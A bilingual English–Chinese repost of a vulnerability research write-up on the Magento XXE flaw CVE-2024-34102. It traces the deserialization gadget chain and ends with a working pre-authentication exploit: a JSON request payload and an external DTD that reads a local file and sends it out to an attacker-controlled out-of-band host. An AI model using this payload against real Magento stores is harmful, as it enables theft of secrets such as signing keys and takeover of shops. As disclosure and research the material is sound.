Why nested deserialization is harmful: Magento XXE (CVE-2024-34102)

渗透技巧 4个月前 admin

167 0 0

Magento is one of the most popular e-commerce solutions in use on the internet. It’s estimated that there are over 140,000 instances of Magento running as of late 2023. Adobe’s most recent advisory for Adobe Commerce / Magento, published on June 11th, 2024 highlighted a critical, pre-authentication XML entity injection issue (CVE-2024-34102) which Adobe rated as CVSS 9.8.
Magento是互联网上最流行的电子商务解决方案之一。据估计，截至 2023 年底，有超过 140,000 个 Magento 实例在运行。Adobe 于 2024 年 6 月 11 日发布的针对 Adobe Commerce/Magento 的最新公告强调了一个关键的预身份验证 XML 实体注入问题（CVE-2024-34102），Adobe 将其评级为 CVSS 9.8。

It was quite surprising to us that no public proof-of-concept existed at the time of us reading the advisory. Given the criticality of this issue and in order to provide customers of our Attack Surface Management Platform certainty around the exploitability of this issue, our security research team developed a proof-of-concept, well before our customers could be exploited by malicious actors.
令我们感到非常惊讶的是，在我们阅读公告时，还没有公开的概念验证。鉴于此问题的严重性，并且为了向攻击面管理平台的客户提供有关此问题的可利用性的确定性，我们的安全研究团队在我们的客户被恶意参与者利用之前就开发了一个概念验证。

We believe that the reason this vulnerability is severe due to the following reasons:
我们认为，此漏洞之所以严重，是因为以下原因：

– It is possible to exfiltrate the app/etc/env.php file from Magento, which contains a cryptographic key used to sign JWTs used for authentication. An attacker can craft an administrator JWT and abuse Magento’s APIs as an admin user on affected installations.
– 可以从 Magento 泄露 app/etc/env.php 文件，其中包含用于对用于身份验证的 JWT 进行签名的加密密钥。攻击者可以构建管理员 JWT，并以管理员用户的身份在受影响的安装上滥用 Magento 的 API。

– The vulnerability can be chained with recent research in PHP filter chains leading to RCE through the CVE-2024-2961 exploit, credit to Charles Fol.
– 该漏洞可能与最近对 PHP 过滤器链的研究相关联，这些研究通过 CVE-2024-2961 漏洞导致 RCE，这要归功于 Charles Fol。

– The broader impacts of XXE (any local file or remote URL’s contents can be exfiltrated).
– XXE 的更广泛影响（任何本地文件或远程 URL 的内容都可能被泄露）。

We want to acknowledge the original author for his excellent work on discovering this vulnerability, Sergey Temnikov. Shortly after this vulnerability was dubbed “CosmicString” by SanSec, he released a limited write-up of the issue, which discusses his methodology in discovering this issue but does not reveal the proof of concept. We highly recommend reading this write-up as he explains Magento’s internal deserialization process and its inherent dangers.
我们要感谢原作者谢尔盖·特姆尼科夫（Sergey Temnikov）在发现此漏洞方面的出色工作。在这个漏洞被SanSec称为“CosmicString”后不久，他发布了一篇关于该问题的有限文章，其中讨论了他发现这个问题的方法，但没有透露概念的证明。我们强烈建议您阅读这篇文章，因为他解释了Magento的内部反序列化过程及其固有的危险。

As we tracked the public knowledge of this vulnerability, we found that SanSec’s original emergency mitigation could be bypassed, and Sergey’s first iteration of the “fixed” mitigation could also be bypassed. This led to both SanSec and Sergey updating their emergency hotfix mitigations over time.
当我们跟踪公众对此漏洞的了解时，我们发现可以绕过 SanSec 的原始紧急缓解措施，并且 Sergey 的第一次“固定”缓解措施也可以绕过。这导致 SanSec 和 Sergey 随着时间的推移更新了他们的紧急修补程序缓解措施。

This was interesting to observe as it highlighted the importance and effectiveness of peer review when it comes to emergency hot fixes and an argument for why disclosing the technical details of a vulnerability is important for the broader security industry.
这很有趣，因为它强调了同行评审在紧急热修复方面的重要性和有效性，并说明了为什么披露漏洞的技术细节对更广泛的安全行业很重要。

To understand the key differences between an unpatched version of Magento and a patched one, we downloaded the packages magento2-2.4.7.zip (unpatched) and magento2-2.4.7-p1.zip (patched) from https://github.com/magento/magento2/releases. Extracting these and then running DiffMerge on these two directories revealed a very important clue to discovering this vulnerability:
为了了解未打补丁的Magento版本和打补丁的版本之间的主要区别，我们从 https://github.com/magento/magento2/releases 下载了magento2-2.4.7.zip（未打补丁）和magento2-2.4.7-p1.zip（打补丁）的软件包。提取这些内容，然后在这两个目录上运行 DiffMerge，揭示了发现此漏洞的一个非常重要的线索：

Why nested deserialization is harmful: Magento XXE (CVE-2024-34102) — Changes added to 2.4.7-p1
添加到 2.4.7-p1 的更改

With the information that was publicly available, i.e., SanSec’s first patch (blocking dataIsURL inside the POST body) as well as the diff we can see in the image above, it was clear to us that this vulnerability was to do with instantiating a SimpleXMLElement. PHP’s documentation for this class revealed that dataIsURL is an argument that can be passed to the SimpleXMLElement constructor, which allows for loading XML from external sources.
根据公开的信息，即 SanSec 的第一个补丁（阻止 POST 正文中的 dataIsURL）以及我们可以在上图中看到的差异，我们很清楚这个漏洞与实例化 SimpleXMLElement 有关。PHP 的此类文档显示，dataIsURL 是一个可以传递给 SimpleXMLElement 构造函数的参数，该构造函数允许从外部源加载 XML。

The additional updates to the hotfix from Sergey revealed that you could not rely on blocking dataIsURL as the vulnerability was exploitable without this, and his mitigation focused on blocking the keyword sourceData.
Sergey 对修补程序的其他更新显示，您不能依赖阻止 dataIsURL，因为如果没有此漏洞，该漏洞是可利用的，他的缓解措施侧重于阻止关键字 sourceData。

With all of this information, we spent most of our time setting up a development environment for Magento and then searching for a deserialization gadget that would lead us to the instantiation of a SimpleXMLElement with controllable arguments.
有了所有这些信息，我们花了大部分时间为Magento设置一个开发环境，然后搜索一个反序列化小工具，该小工具将引导我们实例化具有可控参数的SimpleXMLElement。

When it comes to complex deserialization issues, we highly suggest setting up a development environment with the ability to debug the code by setting breakpoints. For Magento 2, we utilized the following repo to bootstrap our development efforts. This docker image includes XDebug and is already configured for PhpStorm. After spinning up this docker image, we were able to install seed Magento with sample data using the following commands:
当涉及到复杂的反序列化问题时，我们强烈建议设置一个能够通过设置断点来调试代码的开发环境。对于 Magento 2，我们利用以下存储库来引导我们的开发工作。此 docker 映像包含 XDebug，并且已经针对 PhpStorm 进行了配置。在启动此 docker 映像后，我们能够使用以下命令安装带有示例数据的种子 Magento：

./scripts/composer create-project --repository-url=https://repo.magento.com/ magento/project-community-edition=2.4.7 /home/magento # 2.4.7 is the vulnerable version
./scripts/magento setup:install --base-url=http://magento2.test/ --db-host=mysql --db-name=magento_db --db-user=magento_user --db-password="PASSWD#" --admin-firstname=admin --admin-lastname=admin [email protected] --admin-user=admin --admin-password=admin1! --language=en_US --currency=USD --timezone=America/Chicago --use-rewrites=1 --search-engine opensearch --opensearch-host=opensearch --opensearch-port=9200
./scripts/magento sampledata:deploy
./scripts/magento setup:upgrade

When searching through the Magento 2 code base for Simplexml\\Element.*sourceData, we identified the following locations that could be viable targets:
在 Magento 2 代码库中搜索 Simplexml\\Element.*sourceData 时，我们确定了以下可能成为可行目标的位置：

~/Downloads/magento2-2.4.7/app/code/Magento/Quote/Model/Quote/Address/Total/Collector.php:
   70       * @param \Magento\Store\Model\StoreManagerInterface $storeManager
   71       * @param \Magento\Quote\Model\Quote\Address\TotalFactory $totalFactory
   72:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   73       * @param mixed $store
   74       * @param SerializerInterface $serializer

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Config/Ordered.php:
   84       * @param \Psr\Log\LoggerInterface $logger
   85       * @param \Magento\Sales\Model\Config $salesConfig
   86:      * @param \Magento\Framework\Simplexml\Element $sourceData
   87       * @param SerializerInterface $serializer
   88       */

~/Downloads/magento2-2.4.7/app/code/Magento/Sales/Model/Order/Total/Config/Base.php:
   44       * @param \Magento\Sales\Model\Config $salesConfig
   45       * @param \Magento\Sales\Model\Order\TotalFactory $orderTotalFactory
   46:      * @param \Magento\Framework\Simplexml\Element|mixed $sourceData
   47       * @param SerializerInterface $serializer
   48       */

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/Base.php:
   19  
   20      /**
   21:      * @param \Magento\Framework\Simplexml\Element|string $sourceData $sourceData
   22       */
   23      public function __construct($sourceData = null)

~/Downloads/magento2-2.4.7/lib/internal/Magento/Framework/App/Config/BaseFactory.php:
   26       * Create config model
   27       *
   28:      * @param string|\Magento\Framework\Simplexml\Element $sourceData
   29       * @return \Magento\Framework\App\Config\Base
   30       */

From this list, we believed the most likely candidate that could be reached without authentication would be Magento/Quote/Model/Quote/Address/Total/Collector.php. We found that reading through the code itself for how the nesting worked and allowed for the instantiation of sourceData was not obvious.
从这个列表中，我们认为在没有身份验证的情况下最有可能到达的候选者是 Magento/Quote/Model/Quote/Address/Total/Collector.php。我们发现，通读代码本身以了解嵌套的工作方式并允许 sourceData 的实例化并不明显。

To make further headway, it was necessary for us to understand at a high level how the input deserialization works. For that, we looked at magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php and its _createFromArray method:
为了取得进一步的进展，我们有必要在高层次上了解输入反序列化的工作原理。为此，我们研究了 magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php 及其_createFromArray方法：

        $data = is_array($data) ? $data : [];
        // convert to string directly to avoid situations when $className is object
        // which implements __toString method like \ReflectionObject
        $className = (string) $className;
        $class = new ClassReflection($className);
        if (is_subclass_of($className, self::EXTENSION_ATTRIBUTES_TYPE)) {
            $className = substr($className, 0, -strlen('Interface'));
        }

        // Primary method: assign to constructor parameters
        $constructorArgs = $this->getConstructorData($className, $data);
        $object = $this->objectManager->create($className, $constructorArgs);

        // Secondary method: fallback to setter methods
        foreach ($data as $propertyName => $value) {
            // ... SNIP ...

At a high level, if Magento is parsing some input data and expects a field address that contains an \Magento\Quote\Api\Data\Address, what it will do is the following:
在高层次上，如果Magento正在解析一些输入数据，并且需要一个包含\Magento\Quote\Api\Data\Address的字段地址，它将执行以下操作：

– First, if the fields of the JSON match any of the names of the variables in the constructor of the class, pass that field as an argument;
– 首先，如果 JSON 的字段与类构造函数中的任何变量名称匹配，则将该字段作为参数传递;

– Second, if the name doesn’t match, instead look for a method on the class named set plus the field.
– 其次，如果名称不匹配，则在名为 set 和 field 的类上查找方法。

For example, if you passed the following JSON to the /rest/all/V1/guest-carts/test/estimate-shipping-methods endpoint:
例如，如果将以下 JSON 传递给 /rest/all/V1/guest-carts/test/estimate-shipping-methods 端点：

{
    "address": {
        "data": [1, 2, 3],
        "BaseShippingAmount" : 123
    }
}

– The field data is in the constructor of the Address class as array $data = [], so it will be passed there.
– 字段数据作为数组 $data = [] 在 Address 类的构造函数中，因此它将传递到那里。

– The Address class has a method setBaseShippingAmount, so after the class is instantiated it will call ->setBaseShippingAmount(123).
– Address 类有一个方法 setBaseShippingAmount，因此在实例化该类后，它将调用 ->setBaseShippingAmount（123）。

The danger comes from the fact that this is done recursively: if either the constructor or the setter takes a non-primitive type, such as another class, then the deserialization process is done recursively on that field. Looking at the constructor for the Address class, is has 37 parameters, and it’s clear the Magento developers did you intend for you to be able to instantiate all of these:
危险来自于这是以递归方式完成的：如果构造函数或 setter 采用非基元类型，例如另一个类，则反序列化过程将在该字段上递归完成。查看 Address 类的构造函数，它有 37 个参数，很明显 Magento 开发人员是否希望您能够实例化所有这些参数：

    public function __construct(
        Context $context,
        Registry $registry,
        ExtensionAttributesFactory $extensionFactory,
        AttributeValueFactory $customAttributeFactory,
        Data $directoryData,
        \Magento\Eav\Model\Config $eavConfig,
        \Magento\Customer\Model\Address\Config $addressConfig,
        RegionFactory $regionFactory,
        CountryFactory $countryFactory,
        AddressMetadataInterface $metadataService,
        AddressInterfaceFactory $addressDataFactory,
        RegionInterfaceFactory $regionDataFactory,
        DataObjectHelper $dataObjectHelper,
        ScopeConfigInterface $scopeConfig,
        \Magento\Quote\Model\Quote\Address\ItemFactory $addressItemFactory,
        \Magento\Quote\Model\ResourceModel\Quote\Address\Item\CollectionFactory $itemCollectionFactory,
        RateFactory $addressRateFactory,
        RateCollectorInterfaceFactory $rateCollector,
        CollectionFactory $rateCollectionFactory,
        RateRequestFactory $rateRequestFactory,
        CollectorFactory $totalCollectorFactory,
        TotalFactory $addressTotalFactory,
        Copy $objectCopyService,
        CarrierFactoryInterface $carrierFactory,
        Address\Validator $validator,
        Mapper $addressMapper,
        Address\CustomAttributeListInterface $attributeList,
        TotalsCollector $totalsCollector,
        TotalsReader $totalsReader,
        AbstractResource $resource = null,
        AbstractDb $resourceCollection = null,
        array $data = [],
        Json $serializer = null,
        StoreManagerInterface $storeManager = null,
        ?CompositeValidator $compositeValidator = null,
        ?CountryModelsCache $countryModelsCache = null,
        ?RegionModelsCache $regionModelsCache = null,
    ) {

This provides a huge surface for bugs. By traversing chains of constructors and setters, it is possible to instantiate a wide variety of internal classes that were never meant to be user-facing. And if any of those constructors or setters do dangerous things, such as in the case of SimpleXMLElement, this could lead to a security vulnerability. Further details on how to map out the pre-authentication endpoints and corresponding models can be found in Sergey’s write up.
这为错误提供了巨大的表面。通过遍历构造函数和设置器链，可以实例化各种内部类，这些类从来都不是面向用户的。如果这些构造函数或设置器中的任何一个做了危险的事情，例如在 SimpleXMLElement 的情况下，这可能会导致安全漏洞。有关如何绘制预身份验证端点和相应模型的更多详细信息，请参阅 Sergey 的文章。

The goal is now to find a chain of types in constructors that allow us to reach one of the Simplexml sinks identified earlier. Rather than trace the constructor manually for each class, we added the following line to magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php:
现在的目标是在构造函数中找到一系列类型，使我们能够访问前面确定的 Simplexml 接收器之一。我们没有手动跟踪每个类的构造函数，而是在 magento2-2.4.7/lib/internal/Magento/Framework/Webapi/ServiceInputProcessor.php 中添加了以下行：

private function getConstructorData(string $className, array $data): array
    {
        $preferenceClass = $this->config->getPreference($className);
        $class = new ClassReflection($preferenceClass ?: $className);

        try {
            $constructor = $class->getMethod('__construct');
        } catch (\ReflectionException $e) {
            $constructor = null;
        }

        if ($constructor === null) {
            return [];
        }

        $res = [];
        $parameters = $constructor->getParameters();
++      var_dump($parameters);

This simple var_dump helped us to quickly understand all of the different parameters we could provide when calling the unauthenticated REST APIs based on the magic deserialisation logic that Magento had built.
这个简单的var_dump帮助我们快速了解了在基于Magento构建的神奇反序列化逻辑调用未经身份验证的REST API时可以提供的所有不同参数。

We found that the pre-authentication endpoint /rest/all/V1/guest-carts/test/estimate-shipping-methods mentioned earlier was likely the best candidate to reach sourceData through reading the names of the constructor elements.
我们发现，前面提到的预身份验证端点 /rest/all/V1/guest-carts/test/estimate-shipping-methods 可能是通过读取构造函数元素的名称来访问 sourceData 的最佳候选者。

Debugging the available parameters was made easier with our var_dump call, allowing us to quickly iterate on our payload with output as seen below:
通过我们的 var_dump 调用，调试可用参数变得更加容易，使我们能够快速迭代有效负载，输出如下所示：

  object(Laminas\Code\Reflection\ParameterReflection)#1176 (2) {
    ["name"]=>
    string(21) "totalCollectorFactory"
    ["isFromMethod":protected]=>
    bool(false)
  }

With further experimentation, we were able to develop the following payload, which instantiated a SimpleXMLElement with controllable arguments via the sourceData parameter:
通过进一步的实验，我们能够开发以下有效负载，它通过 sourceData 参数实例化了具有可控参数的 SimpleXMLElement：

POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json
Content-Length: 274

{
  "address": {
    "totalsReader": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"http://your_ip:9999/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
            "options": 16
          }
        }
      }
    }
  }
}

With our DTD containing:
我们的 DTD 包含：

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://collabid.oastify.com/dtd.xml?%data;'>">

This resulted in the following:
这导致了以下结果：

Sweet, success! 甜蜜，成功！